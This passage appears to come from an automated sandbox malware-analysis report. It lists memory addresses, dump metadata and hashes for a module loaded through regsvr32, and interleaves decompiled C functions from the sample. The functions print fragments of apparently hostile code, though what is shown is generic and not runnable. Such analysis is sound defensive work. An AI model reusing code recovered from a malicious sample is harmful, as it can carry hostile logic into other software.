                                                                      0x18001bb4c
                                                                      0x18001bb5c
                                                                      0x18001bb63
                                                                      0x18001bb69
                                                                      0x18001bb73
                                                                      0x18001bb7d
                                                                      0x18001bb84
                                                                      0x18001bb8b
                                                                      0x18001bb91
                                                                      0x18001bb96
                                                                      0x18001bb9f
                                                                      0x18001bba8
                                                                      0x18001bbae
                                                                      0x18001bbb3
                                                                      0x18001bbb7
                                                                      0x18001bbba
                                                                      0x18001bbc1
                                                                      0x18001bbc5
                                                                      0x18001bbd0
                                                                      0x18001bbd5
                                                                      0x18001bbdb
                                                                      0x18001bbe2
                                                                      0x18001bbef
                                                                      0x18001bbff
                                                                      0x18001bc01
                                                                      0x18001bc05
                                                                      0x18001bc0d
                                                                      0x18001bc1d
                                                                      0x18001bc24
                                                                      0x18001bc2c
                                                                      0x18001bc2e
                                                                      0x18001bc32
                                                                      0x18001bc36
                                                                      0x18001bc40
                                                                      0x18001bc45
                                                                      0x18001bc4a
                                                                      0x18001bc4e
                                                                      0x18001bc5b
                                                                      0x18001bc61
                                                                      0x18001bc6a
                                                                      0x18001bc6c
                                                                      0x18001bc74
                                                                      0x18001bc77
                                                                      0x18001bc90

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 94e2dcd3c619babe344567d6efdabb7eee6444ce210181e02f62fc4c3d7d4f43
                                                                      • Instruction ID: 87672285aed310a38f1fd1ce3347df2cfdea353399201937fad59fbc8603bd0d
                                                                      • Opcode Fuzzy Hash: 94e2dcd3c619babe344567d6efdabb7eee6444ce210181e02f62fc4c3d7d4f43
                                                                      • Instruction Fuzzy Hash: 8951E077608A5882E7AA8F29C1943BC37A4E359BD8F148109EF4597BD9CF70CE49C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E00000001180027AE4(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t86;
                                                                      				signed int _t90;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t118;
                                                                      				intOrPtr _t129;
                                                                      				void* _t133;
                                                                      				void* _t140;
                                                                      				void* _t143;
                                                                      				intOrPtr _t149;
                                                                      				void* _t156;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t133 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t86 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t110 = _t86 - 5;
                                                                      				if (_t110 > 0) goto 0x80027bcb;
                                                                      				if (_t110 == 0) goto 0x80027b34;
                                                                      				_t111 = _t86;
                                                                      				if (_t111 == 0) goto 0x80027c1f;
                                                                      				if (_t111 == 0) goto 0x80027ba3;
                                                                      				if (_t111 == 0) goto 0x80027b7c;
                                                                      				if (_t111 == 0) goto 0x80027c1f;
                                                                      				if (_t86 - 0xffffffffffffffff != 1) goto 0x80027beb;
                                                                      				_t90 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t143;
                                                                      				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x80027b66;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x80027b66;
                                                                      				 *(__rcx + 0x28) = _t90 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x80027c4a;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x80027c61;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x80027b9d;
                                                                      				goto 0x80027b4f;
                                                                      				goto 0x80027b4f;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t118 == 0) goto 0x80027bc5;
                                                                      				goto 0x80027b4f;
                                                                      				goto 0x80027b4f;
                                                                      				if (_t118 == 0) goto 0x80027b34;
                                                                      				if (_t118 == 0) goto 0x80027b34;
                                                                      				if (_t118 == 0) goto 0x80027b34;
                                                                      				goto 0x80027b22;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t140,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t156);
                                                                      				goto 0x80027cb4;
                                                                      				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x80027c42;
                                                                      				_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8));
                                                                      				goto 0x80027b4f;
                                                                      				goto 0x80027b4f;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xfffffff7;
                                                                      				E0000000118001A174(_t133, _t133 + 0x50,  *((intOrPtr*)(_t133 + 0x30)), _t149,  *((intOrPtr*)(_t133 + 8)));
                                                                      				if (_t149 != 0) goto 0x80027c6a;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t133 + 0x4c)) = 0;
                                                                      				r8b = bpl;
                                                                      				if (_t143 != 8) goto 0x80027c84;
                                                                      				E00000001180028390(_t133, _t149);
                                                                      				goto 0x80027c8b;
                                                                      				E0000000118002843C( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8)), _t133, _t149);
                                                                      				if (0 == 0) goto 0x80027cb2;
                                                                      				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x80027ca4;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x80027cb2;
                                                                      				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}
















                                                                      0x180027ae4
                                                                      0x180027ae9
                                                                      0x180027aee
                                                                      0x180027af8
                                                                      0x180027afb
                                                                      0x180027afe
                                                                      0x180027b01
                                                                      0x180027b04
                                                                      0x180027b0a
                                                                      0x180027b0c
                                                                      0x180027b0e
                                                                      0x180027b17
                                                                      0x180027b20
                                                                      0x180027b25
                                                                      0x180027b2e
                                                                      0x180027b34
                                                                      0x180027b3c
                                                                      0x180027b56
                                                                      0x180027b5b
                                                                      0x180027b63
                                                                      0x180027b6a
                                                                      0x180027b70
                                                                      0x180027b77
                                                                      0x180027b84
                                                                      0x180027b94
                                                                      0x180027b9b
                                                                      0x180027ba1
                                                                      0x180027bab
                                                                      0x180027bb5
                                                                      0x180027bbc
                                                                      0x180027bc3
                                                                      0x180027bc9
                                                                      0x180027bce
                                                                      0x180027bd7
                                                                      0x180027be0
                                                                      0x180027be6
                                                                      0x180027beb
                                                                      0x180027bef
                                                                      0x180027bf2
                                                                      0x180027bf9
                                                                      0x180027bfd
                                                                      0x180027c08
                                                                      0x180027c0d
                                                                      0x180027c13
                                                                      0x180027c1a
                                                                      0x180027c27
                                                                      0x180027c37
                                                                      0x180027c39
                                                                      0x180027c3d
                                                                      0x180027c45
                                                                      0x180027c55
                                                                      0x180027c5c
                                                                      0x180027c64
                                                                      0x180027c66
                                                                      0x180027c6a
                                                                      0x180027c6e
                                                                      0x180027c78
                                                                      0x180027c7d
                                                                      0x180027c82
                                                                      0x180027c86
                                                                      0x180027c93
                                                                      0x180027c99
                                                                      0x180027ca2
                                                                      0x180027ca4
                                                                      0x180027cac
                                                                      0x180027caf
                                                                      0x180027cc8

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 99fabd1e955e1cb912de1c6c94eaf75eb14dd8291b5723ff5b4f7fb32764c5c5
                                                                      • Instruction ID: 18e4e7974adb1b59688e492abcc47cb2aa3e64d7440eb4a47e7895f46b00ef88
                                                                      • Opcode Fuzzy Hash: 99fabd1e955e1cb912de1c6c94eaf75eb14dd8291b5723ff5b4f7fb32764c5c5
                                                                      • Instruction Fuzzy Hash: 3D51B07370465886E7AB8F38C0653AC37A2E359B98F248119EF491779ACF30CE85C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118001DC24(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t86;
                                                                      				signed int _t90;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t118;
                                                                      				intOrPtr _t129;
                                                                      				void* _t133;
                                                                      				void* _t140;
                                                                      				void* _t143;
                                                                      				intOrPtr _t149;
                                                                      				void* _t156;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t133 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t86 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t110 = _t86 - 5;
                                                                      				if (_t110 > 0) goto 0x8001dd0b;
                                                                      				if (_t110 == 0) goto 0x8001dc74;
                                                                      				_t111 = _t86;
                                                                      				if (_t111 == 0) goto 0x8001dd5f;
                                                                      				if (_t111 == 0) goto 0x8001dce3;
                                                                      				if (_t111 == 0) goto 0x8001dcbc;
                                                                      				if (_t111 == 0) goto 0x8001dd5f;
                                                                      				if (_t86 - 0xffffffffffffffff != 1) goto 0x8001dd2b;
                                                                      				_t90 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t143;
                                                                      				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x8001dca6;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001dca6;
                                                                      				 *(__rcx + 0x28) = _t90 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001dd8a;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001dda1;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001dcdd;
                                                                      				goto 0x8001dc8f;
                                                                      				goto 0x8001dc8f;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t118 == 0) goto 0x8001dd05;
                                                                      				goto 0x8001dc8f;
                                                                      				goto 0x8001dc8f;
                                                                      				if (_t118 == 0) goto 0x8001dc74;
                                                                      				if (_t118 == 0) goto 0x8001dc74;
                                                                      				if (_t118 == 0) goto 0x8001dc74;
                                                                      				goto 0x8001dc62;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t140,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t156);
                                                                      				goto 0x8001ddf4;
                                                                      				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001dd82;
                                                                      				_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8));
                                                                      				goto 0x8001dc8f;
                                                                      				goto 0x8001dc8f;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xfffffff7;
                                                                      				E0000000118001A174(_t133, _t133 + 0x50,  *((intOrPtr*)(_t133 + 0x30)), _t149,  *((intOrPtr*)(_t133 + 8)));
                                                                      				if (_t149 != 0) goto 0x8001ddaa;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t133 + 0x4c)) = 0;
                                                                      				r8b = bpl;
                                                                      				if (_t143 != 8) goto 0x8001ddc4;
                                                                      				E00000001180026870(_t133, _t149);
                                                                      				goto 0x8001ddcb;
                                                                      				E0000000118002691C( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8)), _t133, _t149);
                                                                      				if (0 == 0) goto 0x8001ddf2;
                                                                      				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x8001dde4;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x8001ddf2;
                                                                      				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}
















                                                                      0x18001dc24
                                                                      0x18001dc29
                                                                      0x18001dc2e
                                                                      0x18001dc38
                                                                      0x18001dc3b
                                                                      0x18001dc3e
                                                                      0x18001dc41
                                                                      0x18001dc44
                                                                      0x18001dc4a
                                                                      0x18001dc4c
                                                                      0x18001dc4e
                                                                      0x18001dc57
                                                                      0x18001dc60
                                                                      0x18001dc65
                                                                      0x18001dc6e
                                                                      0x18001dc74
                                                                      0x18001dc7c
                                                                      0x18001dc96
                                                                      0x18001dc9b
                                                                      0x18001dca3
                                                                      0x18001dcaa
                                                                      0x18001dcb0
                                                                      0x18001dcb7
                                                                      0x18001dcc4
                                                                      0x18001dcd4
                                                                      0x18001dcdb
                                                                      0x18001dce1
                                                                      0x18001dceb
                                                                      0x18001dcf5
                                                                      0x18001dcfc
                                                                      0x18001dd03
                                                                      0x18001dd09
                                                                      0x18001dd0e
                                                                      0x18001dd17
                                                                      0x18001dd20
                                                                      0x18001dd26
                                                                      0x18001dd2b
                                                                      0x18001dd2f
                                                                      0x18001dd32
                                                                      0x18001dd39
                                                                      0x18001dd3d
                                                                      0x18001dd48
                                                                      0x18001dd4d
                                                                      0x18001dd53
                                                                      0x18001dd5a
                                                                      0x18001dd67
                                                                      0x18001dd77
                                                                      0x18001dd79
                                                                      0x18001dd7d
                                                                      0x18001dd85
                                                                      0x18001dd95
                                                                      0x18001dd9c
                                                                      0x18001dda4
                                                                      0x18001dda6
                                                                      0x18001ddaa
                                                                      0x18001ddae
                                                                      0x18001ddb8
                                                                      0x18001ddbd
                                                                      0x18001ddc2
                                                                      0x18001ddc6
                                                                      0x18001ddd3
                                                                      0x18001ddd9
                                                                      0x18001dde2
                                                                      0x18001dde4
                                                                      0x18001ddec
                                                                      0x18001ddef
                                                                      0x18001de08

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 99c49ebe9367b7ca43954a62dfc4c1e4570377e20c077a3e1ecb64b5a3121a39
                                                                      • Instruction ID: 0ef28460a0c822f4bf437939ee7fba885f900a380e0ba88a77a5f23a1b002aef
                                                                      • Opcode Fuzzy Hash: 99c49ebe9367b7ca43954a62dfc4c1e4570377e20c077a3e1ecb64b5a3121a39
                                                                      • Instruction Fuzzy Hash: 1651D073614E5C82E7AA8F28D1543BC37A0E359B98F15810AEF4617799CF30CE89C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ca4ccf4759aff5df73f51db57c0795af1ce1a58f12e1e4d698c42f2ceba0ce76
                                                                      • Instruction ID: 6d38cb0cce806e14776f9978f0d3b8cb5ba98c1f6180e926dde9fa7ff541b819
                                                                      • Opcode Fuzzy Hash: ca4ccf4759aff5df73f51db57c0795af1ce1a58f12e1e4d698c42f2ceba0ce76
                                                                      • Instruction Fuzzy Hash: 68414761F65BDA4BFE439A7A5813BF00A00AFA77C5E81E312FD1777B01EB28454A8200
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5aeb7000e9b4391dd39bb611356051274a468dcdb65d498759d28b103ea1e868
                                                                      • Instruction ID: 034554b7a1470a8e425358260655dd721da16227c419870f25634d669fa5c0bd
                                                                      • Opcode Fuzzy Hash: 5aeb7000e9b4391dd39bb611356051274a468dcdb65d498759d28b103ea1e868
                                                                      • Instruction Fuzzy Hash: 79414B7410DB888FC768DF2CD48565ABBE0FB9A304F004A6EE58EC7212DB309945CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 56%
                                                                      			E0000000118002964C(signed int __edx, void* __edi, void* __esp, long long __rbx, signed long long*** __rcx, long long __rsi) {
                                                                      				void* _t24;
                                                                      				int _t26;
                                                                      				signed int _t51;
                                                                      				void* _t52;
                                                                      				signed long long _t66;
                                                                      				signed int* _t73;
                                                                      				signed long long _t75;
                                                                      				signed long long _t77;
                                                                      				signed long long _t78;
                                                                      				signed long long _t95;
                                                                      				signed long long _t96;
                                                                      				signed long long _t98;
                                                                      				signed long long _t104;
                                                                      				long long _t115;
                                                                      				void* _t117;
                                                                      				void* _t120;
                                                                      				signed long long* _t123;
                                                                      				signed long long _t124;
                                                                      				signed long long _t126;
                                                                      				signed long long _t129;
                                                                      				signed long long*** _t132;
                                                                      
                                                                      				_t52 = __edi;
                                                                      				_t51 = __edx;
                                                                      				 *((long long*)(_t117 + 0x10)) = __rbx;
                                                                      				 *((long long*)(_t117 + 0x18)) = _t115;
                                                                      				 *((long long*)(_t117 + 0x20)) = __rsi;
                                                                      				_t66 =  *((intOrPtr*)(__rcx));
                                                                      				_t132 = __rcx;
                                                                      				_t73 =  *_t66;
                                                                      				if (_t73 == 0) goto 0x800297e0;
                                                                      				_t124 =  *0x80072078; // 0xc949cbcab002
                                                                      				_t111 =  *_t73 ^ _t124;
                                                                      				asm("dec eax");
                                                                      				_t75 = _t73[4] ^ _t124;
                                                                      				asm("dec ecx");
                                                                      				asm("dec eax");
                                                                      				if ((_t73[2] ^ _t124) != _t75) goto 0x80029752;
                                                                      				_t77 = _t75 - ( *_t73 ^ _t124) >> 3;
                                                                      				_t101 =  >  ? _t66 : _t77;
                                                                      				_t6 = _t115 + 0x20; // 0x20
                                                                      				_t102 = ( >  ? _t66 : _t77) + _t77;
                                                                      				_t103 =  ==  ? _t66 : ( >  ? _t66 : _t77) + _t77;
                                                                      				if (( ==  ? _t66 : ( >  ? _t66 : _t77) + _t77) - _t77 < 0) goto 0x800296ee;
                                                                      				_t7 = _t115 + 8; // 0x8
                                                                      				r8d = _t7;
                                                                      				E0000000118004488C(_t6, _t77, _t111,  ==  ? _t66 : ( >  ? _t66 : _t77) + _t77, _t111, _t115, _t120);
                                                                      				_t24 = E0000000118003A674(_t66, _t111);
                                                                      				if (_t66 != 0) goto 0x80029716;
                                                                      				_t104 = _t77 + 4;
                                                                      				r8d = 8;
                                                                      				E0000000118004488C(_t24, _t77, _t111, _t104, _t111, _t115, _t120);
                                                                      				_t129 = _t66;
                                                                      				_t26 = E0000000118003A674(_t66, _t111);
                                                                      				if (_t129 == 0) goto 0x800297e0;
                                                                      				_t123 = _t129 + _t77 * 8;
                                                                      				_t78 = _t129 + _t104 * 8;
                                                                      				_t88 =  >  ? _t115 : _t78 - _t123 + 7 >> 3;
                                                                      				_t64 =  >  ? _t115 : _t78 - _t123 + 7 >> 3;
                                                                      				if (( >  ? _t115 : _t78 - _t123 + 7 >> 3) == 0) goto 0x80029752;
                                                                      				memset(_t52, _t26, 0 << 0);
                                                                      				_t126 =  *0x80072078; // 0xc949cbcab002
                                                                      				r8d = 0x40;
                                                                      				asm("dec eax");
                                                                      				 *_t123 =  *(_t132[1]) ^ _t126;
                                                                      				_t95 =  *0x80072078; // 0xc949cbcab002
                                                                      				asm("dec eax");
                                                                      				 *( *( *_t132)) = _t129 ^ _t95;
                                                                      				_t96 =  *0x80072078; // 0xc949cbcab002
                                                                      				asm("dec eax");
                                                                      				( *( *_t132))[1] =  &(_t123[1]) ^ _t96;
                                                                      				_t98 =  *0x80072078; // 0xc949cbcab002
                                                                      				r8d = r8d - (_t51 & 0x0000003f);
                                                                      				asm("dec eax");
                                                                      				( *( *_t132))[2] = _t78 ^ _t98;
                                                                      				goto 0x800297e3;
                                                                      				return 0xffffffff;
                                                                      			}
























                                                                      0x18002964c
                                                                      0x18002964c
                                                                      0x18002964c
                                                                      0x180029651
                                                                      0x180029656
                                                                      0x180029664
                                                                      0x180029669
                                                                      0x18002966c
                                                                      0x180029672
                                                                      0x180029678
                                                                      0x180029690
                                                                      0x180029696
                                                                      0x180029699
                                                                      0x18002969c
                                                                      0x18002969f
                                                                      0x1800296a5
                                                                      0x1800296b3
                                                                      0x1800296bd
                                                                      0x1800296c1
                                                                      0x1800296c4
                                                                      0x1800296c7
                                                                      0x1800296ce
                                                                      0x1800296d0
                                                                      0x1800296d0
                                                                      0x1800296da
                                                                      0x1800296e4
                                                                      0x1800296ec
                                                                      0x1800296ee
                                                                      0x1800296f2
                                                                      0x1800296fe
                                                                      0x180029705
                                                                      0x180029708
                                                                      0x180029710
                                                                      0x18002971d
                                                                      0x180029721
                                                                      0x180029739
                                                                      0x18002973d
                                                                      0x180029740
                                                                      0x180029748
                                                                      0x18002974b
                                                                      0x180029752
                                                                      0x180029771
                                                                      0x180029777
                                                                      0x18002977a
                                                                      0x18002978d
                                                                      0x180029796
                                                                      0x18002979c
                                                                      0x1800297ad
                                                                      0x1800297b6
                                                                      0x1800297ba
                                                                      0x1800297c6
                                                                      0x1800297cf
                                                                      0x1800297da
                                                                      0x1800297de
                                                                      0x1800297fb

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: BoundaryDeleteDescriptorErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2050971199-0
                                                                      • Opcode ID: 9e4e52b0d3f935efd15956d2766b8d90505c679b9ec022b08f676ee6afb4daa1
                                                                      • Instruction ID: 9d609cce05d885b31014645927e5d34449670e6a1859360f3accb1f4c4c2e444
                                                                      • Opcode Fuzzy Hash: 9e4e52b0d3f935efd15956d2766b8d90505c679b9ec022b08f676ee6afb4daa1
                                                                      • Instruction Fuzzy Hash: CF41E232324A5882FF85CF6AE91439973A1A74CFD4F49D126EE4D87B58DE3DC24A8340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 113cc1913946c26b77c6bc86a1c289a4476849ab805ca8423c4e5b6d879ed523
                                                                      • Instruction ID: 4cb7108ca58667c6caa2b31ab82ebf35dc68dced4ca97112707fc31b546be7a1
                                                                      • Opcode Fuzzy Hash: 113cc1913946c26b77c6bc86a1c289a4476849ab805ca8423c4e5b6d879ed523
                                                                      • Instruction Fuzzy Hash: CC41D6B090038A8BCF4CDF28D9964EE7BB5FB48308F15462DEC5AAA350D7749665CF84
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 59%
                                                                      			E0000000118000EF80(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, long long _a16) {
                                                                      				long long _v16;
